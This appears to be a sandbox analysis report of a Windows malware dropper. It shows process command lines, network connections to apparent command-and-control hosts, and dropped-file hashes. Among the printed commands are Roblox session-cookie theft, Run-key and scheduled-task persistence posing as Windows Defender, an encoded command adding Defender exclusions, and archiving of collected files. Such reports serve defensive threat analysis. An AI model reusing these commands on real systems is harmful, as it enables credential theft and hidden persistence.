C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe
"C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe"
C:\Users\Admin\AppData\Local\Temp\Files\crypted25.exe
"C:\Users\Admin\AppData\Local\Temp\Files\crypted25.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5208 -ip 5208
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5208 -s 620
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Users\Admin\AppData\Local\Temp\1788639319.exe
C:\Users\Admin\AppData\Local\Temp\1788639319.exe
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\577D.tmp\577E.tmp\577F.bat C:\Windows\system32\java.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6817.tmp\6818.tmp\6819.bat C:\Windows\system32\java.exe"
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\System32\dwm.exe
C:\Windows\System32\dwm.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARgBpAGwAZQBzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAEYAaQBsAGUAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAGQAbwBjAHUAbQBlAG4AdABzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABkAG8AYwB1AG0AZQBuAHQAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlAA==
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 540 -p 1900 -ip 1900
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Users\Admin\AppData\Local\Temp\Files\njrat.exe
"C:\Users\Admin\AppData\Local\Temp\Files\njrat.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 224
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI57682\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\c42z4.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI57682\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI57682\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\c42z4.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
"Powershell" Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Files\hhnjqu9y.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ucloud.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2496 -ip 2496
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Users\Admin\AppData\Local\Temp\Files\si.exe
"C:\Users\Admin\AppData\Local\Temp\Files\si.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe" -service -lunch
C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\137A.tmp\137B.tmp\137C.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.194.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.194.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| CN | 183.57.21.131:8095 | tcp | |
| US | 8.8.8.8:53 | 22.148.83.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | police-turkish.gl.at.ply.gg | udp |
| US | 147.185.221.20:46359 | police-turkish.gl.at.ply.gg | tcp |
| RU | 185.215.113.217:80 | 185.215.113.217 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 8.8.8.8:53 | 217.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | pozza.cyou | udp |
| DE | 116.203.8.137:443 | pozza.cyou | tcp |
| US | 8.8.8.8:53 | 11.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | pozza.cyou | tcp |
| DE | 116.203.8.137:443 | pozza.cyou | tcp |
| US | 8.8.8.8:53 | 137.8.203.116.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | pozza.cyou | tcp |
| DE | 116.203.8.137:443 | pozza.cyou | tcp |
| US | 107.175.202.158:25565 | tcp | |
| DE | 116.203.8.137:443 | pozza.cyou | tcp |
| DE | 116.203.8.137:443 | pozza.cyou | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| CN | 183.57.21.131:8095 | tcp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 216.58.201.97:443 | clients2.googleusercontent.com | tcp |
| US | 147.185.221.20:46359 | police-turkish.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| US | 107.175.202.158:25565 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| DE | 116.203.8.137:443 | pozza.cyou | tcp |
| DE | 116.203.8.137:443 | pozza.cyou | tcp |
| DE | 116.203.8.137:443 | pozza.cyou | tcp |
| DE | 116.203.8.137:443 | pozza.cyou | tcp |
| DE | 116.203.8.137:443 | pozza.cyou | tcp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 107.175.202.158:443 | tcp | |
| DE | 116.203.8.137:443 | pozza.cyou | tcp |
| N/A | 127.0.0.1:9223 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 104.208.16.94:443 | nw-umwatson.events.data.microsoft.com | tcp |
| DE | 116.203.8.137:443 | pozza.cyou | tcp |
| US | 8.8.8.8:53 | 94.16.208.104.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | pozza.cyou | tcp |
| DE | 116.203.8.137:443 | pozza.cyou | tcp |
| DE | 116.203.8.137:443 | pozza.cyou | tcp |
| US | 107.175.202.158:30814 | tcp | |
| DE | 116.203.8.137:443 | pozza.cyou | tcp |
| DE | 116.203.8.137:443 | pozza.cyou | tcp |
| DE | 116.203.8.137:443 | pozza.cyou | tcp |
| DE | 116.203.8.137:443 | pozza.cyou | tcp |
| US | 8.8.8.8:53 | twizthash.net | udp |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| DE | 116.203.8.137:443 | pozza.cyou | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| DE | 116.203.8.137:443 | pozza.cyou | tcp |
| US | 8.8.8.8:53 | 66.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| US | 107.175.202.158:30814 | tcp | |
| US | 8.8.8.8:53 | liveos.zapto.org | udp |
| NL | 194.26.192.138:2404 | liveos.zapto.org | tcp |
| N/A | 192.168.8.103:4782 | tcp | |
| US | 8.8.8.8:53 | blank-ah9e6.in | udp |
| DE | 116.203.8.137:443 | pozza.cyou | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | pozza.cyou | tcp |
| US | 147.185.221.20:46359 | police-turkish.gl.at.ply.gg | tcp |
| DE | 116.203.8.137:443 | pozza.cyou | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 142.250.179.227:443 | gstatic.com | tcp |
| US | 107.175.202.158:6606 | tcp | |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| US | 8.8.8.8:53 | 227.179.250.142.in-addr.arpa | udp |
| CN | 124.220.235.28:80 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| US | 107.175.202.158:443 | tcp | |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 8.8.8.8:53 | 84.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.138.159.162.in-addr.arpa | udp |
| US | 107.175.202.158:25565 | tcp | |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| US | 20.83.148.22:80 | tcp | |
| N/A | 192.168.8.105:4782 | tcp | |
| US | 8.8.8.8:53 | blank-iwqkt.in | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | GDinpHlLXN.GDinpHlLXN | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 142.250.179.227:443 | gstatic.com | tcp |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| US | 8.8.8.8:53 | police-turkish.gl.at.ply.gg | udp |
| US | 147.185.221.20:46359 | police-turkish.gl.at.ply.gg | tcp |
| US | 107.175.202.158:6606 | tcp | |
| CN | 117.50.163.22:8080 | tcp | |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.233.202.91.in-addr.arpa | udp |
| US | 107.175.202.158:6606 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | twizthash.net | udp |
| RU | 185.215.113.66:5152 | twizthash.net | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| US | 107.175.202.158:30814 | tcp | |
| US | 8.8.8.8:53 | fansydestrikeball.space | udp |
| US | 8.8.8.8:53 | berrylinyj.cyou | udp |
| US | 104.21.14.6:443 | fansydestrikeball.space | tcp |
| US | 8.8.8.8:53 | worddosofrm.shop | udp |
| US | 8.8.8.8:53 | 108.209.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.14.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mutterissuen.shop | udp |
| US | 8.8.8.8:53 | standartedby.shop | udp |
| US | 8.8.8.8:53 | nightybinybz.shop | udp |
| US | 8.8.8.8:53 | conceszustyb.shop | udp |
| US | 8.8.8.8:53 | bakedstusteeb.shop | udp |
| US | 8.8.8.8:53 | respectabosiz.shop | udp |
| US | 8.8.8.8:53 | moutheventushz.shop | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| UZ | 62.209.135.143:40500 | udp | |
| MX | 187.192.185.201:40500 | tcp | |
| US | 8.8.8.8:53 | marshal-zhukov.com | udp |
| US | 172.67.160.80:443 | marshal-zhukov.com | tcp |
| US | 8.8.8.8:53 | 155.143.214.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.135.209.62.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.160.67.172.in-addr.arpa | udp |
| N/A | 192.168.8.114:4782 | tcp | |
| NL | 178.215.224.96:7886 | tcp | |
| IR | 46.248.34.12:40500 | udp | |
| US | 107.175.202.158:30814 | tcp | |
| US | 8.8.8.8:53 | police-turkish.gl.at.ply.gg | udp |
| CN | 183.57.21.131:8095 | tcp | |
| US | 147.185.221.20:46359 | police-turkish.gl.at.ply.gg | tcp |
| US | 198.163.199.114:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| US | 107.175.202.158:443 | tcp | |
| NL | 178.215.224.96:7886 | tcp | |
| SY | 82.137.218.134:40500 | udp | |
| KZ | 95.58.91.70:40500 | udp | |
| US | 107.175.202.158:443 | tcp | |
| IR | 5.232.155.0:40500 | udp | |
| PK | 39.42.48.119:40500 | tcp | |
| NL | 178.215.224.96:7886 | tcp | |
| N/A | 192.168.8.103:4782 | tcp | |
| US | 107.175.202.158:443 | tcp | |
| NL | 185.202.113.6:80 | 185.202.113.6 | tcp |
| AO | 102.219.187.80:40500 | udp | |
| US | 8.8.8.8:53 | soportegira.net | udp |
| NL | 185.202.113.6:4243 | tcp | |
| ES | 83.175.202.178:80 | soportegira.net | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| YE | 46.35.80.190:40500 | udp | |
| US | 147.185.221.20:46359 | police-turkish.gl.at.ply.gg | tcp |
| NL | 178.215.224.96:7886 | tcp | |
| US | 8.8.8.8:53 | rl.ammyy.com | udp |
| US | 107.175.202.158:6606 | tcp | |
| NL | 188.42.129.148:80 | rl.ammyy.com | tcp |
| DE | 136.243.104.235:443 | tcp | |
| MX | 189.164.170.136:40500 | udp |
Files
memory/3100-0-0x0000000074CAE000-0x0000000074CAF000-memory.dmp
memory/3100-1-0x00000000004F0000-0x00000000004F8000-memory.dmp
memory/3100-2-0x0000000004E30000-0x0000000004ECC000-memory.dmp
memory/3100-3-0x0000000074CA0000-0x0000000075450000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\test8.exe
| MD5 | cae51fb5013ed684a11d68d9f091e750 |
| SHA1 | 28842863733c99a13b88afeb13408632f559b190 |
| SHA256 | 67256a1f764ec403d8a1bcb009e701069b815db72869eae0b59dab1f23ebc8e8 |
| SHA512 | 492961ea16f34bafa9e8695eeffef94cc649e29d7ad9da8c02b4bc49c33878cf9d75d6cdb69f7ad6713f6e5296750bd52dc08b70cd6e6c0ad963de6ca87f0ec6 |
C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
| MD5 | 41138d08c05c7c0fc7d23c2364d8d90b |
| SHA1 | 3abfe164faf8597e4c2a9f27883f0a31238bcb13 |
| SHA256 | 7e229099c42890098639bb0c37fe56ab5020b237884f039d3428a9d9018a84b2 |
| SHA512 | aea8d6f1294d8ee418a14022f638b6334f7b16675fa92b3705cf6493d7a0371b7acfaa375fefddcc9d12f869087d7a78ff767a679ca684a235bd17528ae9df53 |
memory/524-23-0x00007FFA5E613000-0x00007FFA5E615000-memory.dmp
memory/524-24-0x00000000007C0000-0x00000000007CE000-memory.dmp
memory/3604-25-0x00000000001A0000-0x00000000001F4000-memory.dmp
memory/3604-27-0x00000000001A0000-0x00000000001A3000-memory.dmp
memory/3604-26-0x0000000000660000-0x00000000006C1000-memory.dmp
memory/3100-28-0x0000000074CAE000-0x0000000074CAF000-memory.dmp
memory/3100-29-0x0000000074CA0000-0x0000000075450000-memory.dmp
memory/3604-30-0x0000000000400000-0x0000000000460000-memory.dmp
memory/524-31-0x00007FFA5E613000-0x00007FFA5E615000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\BeamNG.UI.exe
| MD5 | 583b2abf1d9d7ee5e3b21d671074f691 |
| SHA1 | d6557131cd6266d9a7fa3a301a852809dab5e481 |
| SHA256 | fc1443222c765d941e38f6e796f9fd82538ac31ba06322e7534eeccf08f0e2c4 |
| SHA512 | 50e67acd3c0acb719986a005fa3a63ce28a4f5a454f2ff3ec2b37457a73161b4140518eb978d2dfa09ed28113ab36429006bf1a25a3a06e9dcde632b2c480072 |
memory/4736-44-0x0000000000EA0000-0x0000000000EB2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\5447jsX.exe
| MD5 | 5dd9c1ffc4a95d8f1636ce53a5d99997 |
| SHA1 | 38ae8bf6a0891b56ef5ff0c1476d92cecae34b83 |
| SHA256 | d695267de534c2c99ec2823acc193fdbec9f398b0f78155ae2b982457ff631aa |
| SHA512 | 148d1b324391c4bb63b152a3c91a586b6821c4f5cde2a3f7afa56ad92074672619554fba3b2baca9802ff1ed9b42081574163304d450f7ccf664638599b23c2a |
memory/940-53-0x0000000000400000-0x0000000000643000-memory.dmp
memory/940-54-0x0000000000400000-0x0000000000643000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\VBVEd6f.exe
| MD5 | 4ea576c1e8f58201fd4219a86665eaa9 |
| SHA1 | efaf3759b04ee0216254cf07095d52b110c7361f |
| SHA256 | d94206d9509cc47cae22c94d32658b31cf65c37b1b15ce035ffaa5ce5872ad2f |
| SHA512 | 0c7462bc590d06f0ead37246f189d4d56e1d62ff73f67bf7e2ce9c653d8c56812a5f1306fb504168f7e33b87485c3465ea921a36f1ba5b458d7763e45c649494 |
memory/4824-63-0x0000000000400000-0x000000000066D000-memory.dmp
memory/4736-64-0x00000000032F0000-0x0000000003356000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\maza-0.16.3-win64-setup-unsigned.exe
| MD5 | 3bcb9a06b0a213eef96cbd772f127a48 |
| SHA1 | 359470a98c701fef2490efb9e92f6715f7b1975e |
| SHA256 | 563f37e8208427a38cde013f785d2a4cbb9aac29e93dc1233d28b9762d3eddec |
| SHA512 | 60431dd4aa91c43dadfbcb698cf1b6590b098fbd3b41c37fdcc22dc13a9a9085cfd38182bbbc9ef68a22070029d7613359d938a8fe6827ae7107376ded8022ba |
\??\pipe\crashpad_1916_FRLKMBNWMMNEAGHP
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\nsa5234.tmp\System.dll
| MD5 | 8643641707ff1e4a3e1dfda207b2db72 |
| SHA1 | f6d766caa9cafa533a04dd00e34741d276325e13 |
| SHA256 | d1b94797529c414b9d058c17dbd10c989eef59b1fa14eea7f61790d7cfa7fd25 |
| SHA512 | cc8e07395419027914a6d4b3842ac7d4f14e3ec8be319bfe5c81f70bcf757f8c35f0aaeb985c240b6ecc71fc3e71b9f697ccda6e71f84ac4930adf5eac801181 |
C:\Users\Admin\AppData\Local\Temp\nsa5234.tmp\nsDialogs.dll
| MD5 | 79a0bde19e949a8d90df271ca6e79cd2 |
| SHA1 | 946ad18a59c57a11356dd9841bec29903247bb98 |
| SHA256 | 8353f495064aaf30b32b02f5d935c21f86758f5a99d8ee5e8bf8077b907fad90 |
